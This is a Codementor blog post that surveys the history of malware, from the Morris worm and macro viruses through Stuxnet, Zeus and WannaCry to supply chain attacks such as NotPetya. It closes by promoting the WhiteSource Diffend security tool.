LOG IN
Find MentorsFind FreelancersCommunity PostBlog
SIGN UP
LOG IN
Codementor Events
Josh Robins
Follow
Developer, AppSec and DevOps Advocate.

Evolution of Malware in Open Source Attacks

Published Dec 29, 2021
Evolution of Malware in Open Source Attacks

Malicious software, aka malware, has been in the picture for as long as computers have been. In the last decade, computers are becoming more and more integral to our day-to-day lives. This increase can be attributed to technological evolution and the increasing use of the internet.

With computers and the internet getting cheaper and affordable, a huge chunk of the population spends more than 5 hours daily on their devices. However, with the rise of computers, malware has evolved as well.

Just in the last decade, there has been a more than 87% increase in malware infections. Initially, malwares were simple and spread by floppy disks. As computer networks expanded, malicious softwares evolved and started using the internet as a way of propagation.

Morris Worm

While there were many malwares present in the 1980s, the Morris worm was the first computer worm to be distributed via the internet and gain media attention.

Morris worm utilized zero-day exploits in fingered service---it used information security to remotely access computers in the network and use those computers to spread itself to more computers.

Over two thousand computers were infected by the Morris worm within fifteen hours. The Morris worm remarkably affected more than 10% of all the computers connected to the internet causing damages from $100,000 to $10,000,000.

Macro Malwares

Many malwares exploit Microsoft Office to spread themselves to a number of hosts. These macro malwares started spreading as email attachments.

In 1995, the first macro virus, called Concept, was created. Macro viruses are written in the Macro programming language. Certain softwares, such as Microsoft Word, Powerpoint, and Excel, automatically execute macros when a document is opened.

Due to the widespread usage of electronic documents, the method of spreading malware via office documents took off. As macro viruses target softwares instead of specific machines, a macro virus can run on all computers running vulnerable softwares without needing any modification.

Attackers heavily relied on social engineering as well. In 2000, a computer worm named ILOVEYOU infected millions of Windows computers worldwide within only a few hours of its release.

Attackers are always looking for new and innovative ways to find targets and spread their malware over the internet. In 2004, Webworm utilized a vulnerability in a website service called phpBB to exploit and spread itself. Webworm is the first-ever worm to utilize a web search engine (Google) to find vulnerable targets on the internet.

Stuxnet

Source

If malware development is art, then the Stuxnet worm is the Mona Lisa of computer worms.

The development and infection of Stuxnet was so stealthy that nobody knows when it was first encountered. Its development is presumed to have been started between 2005 and 2006.

Stuxnet was uncovered in 2010 with evidence suggesting it had a hand in causing substantial damage to the nuclear program of Iran. While it has not been officially admitted, it is believed that Stuxnet was jointly developed by the United States and Israel.

The Stuxnet malware had a big impact on Iran's nuclear program. The malware single-handedly made one-fifth of its nuclear centrifuges useless. The attackers took extreme care to make sure to only affect the target computers: the computers with the "siemens step 7" software, which was used in the Iranian centrifuge systems. The whole Stuxnet operation was like a marksman's hit job to take down only specific targets.

Zeus Banking Trojan

The FBI announced the discovery of Zeus being used to infect computers around the world by hackers in Eastern Europe. Even antivirus softwares failed to detect the Zeus trojan due to its highly stealthy techniques.

Due to its stealth, Zeus became the largest botnet on the internet, infecting over 3.6 million computers in the United States alone. The main motivation behind the attacks was the theft of the banking details of victims.

Once infected, the Zeus trojan silently monitored user activity to secretly capture bank account numbers, passwords, and other details, which were used to hijack victims' bank accounts and make illegal overseas wire transfers.

Wannacry Ransomware

Source

The ransomware that made the world shake was Wannacry. It targeted computers worldwide running Microsoft Windows and encrypted all user data to demand ransom in the form of Bitcoins in exchange for the release of the user data.

Exploits for older windows operating systems---lethal weapons used to remotely hack into Windows computers---were developed by the NSA and later leaked by a hacker group called The Shadow Brokers. Almost a year after the leak, attackers behind Wannacry ransomware used those cyber weapons to create the malware.

The estimated number of infected computers is more than 200,000 across 150 countries, resulting in billions of dollars of financial damages. The attack is believed to have originated from North Korea.

Supply Chain Attacks

Supply chain attacks are possible in any industry. Instead of targeting the product, the attackers tamper with the manufacturing process by installing malware or spying tools directly into the product.

One example of a supply chain attack is NotPetya. In 2017, a widely used software in Ukraine, M.E. Doc, was infected with the NotPetya malware to infect a huge number of computers in Ukraine.

Unlike other malware attacks, supply chain attacks are the hardest to fight and detect. In most cases, antivirus systems begin scanning once malicious packages are already built into the product, which does little to prevent the attack. However, modern free tools like WhiteSource Diffend provide a comprehensive supply chain security solution.

WhiteSource Diffend prevents the installation of malicious packages as well as detects malicious updates in existing packages. Diffend does the job of accurately detecting the infection without thwarting the developers' work and prevents infections from the earliest stages of the development cycle.

As of now, Diffend provides amazing protection against supply chain attacks involving Ruby and Javascript while notifying developers of the results through their intuitive user interface and slack notifications.

Conclusion

Attackers are constantly upping their game with modern techniques and attack vectors, but so are the good guys. By keeping a vigilant attitude towards cybercrime trends and keeping your malware defense systems up to date, it is possible to fight modern malwares.

Cover Photo by Erik Mclean on Unsplash

Open source softwareCybersecurityMalwareHistorySecurity software
Report

Enjoy this post? Give Josh Robins a like if it's helpful.

post comments
Josh Robins
Developer, AppSec and DevOps Advocate.
I'm all about food, writing and coding. Not in the exact order but would definitely love to eat while I write about code :)
Follow
Discover and read more posts from Josh Robins
get started
post commentsBe the first to share your opinion
MarkdownGitHub flavored markdown supported
submit
Show more replies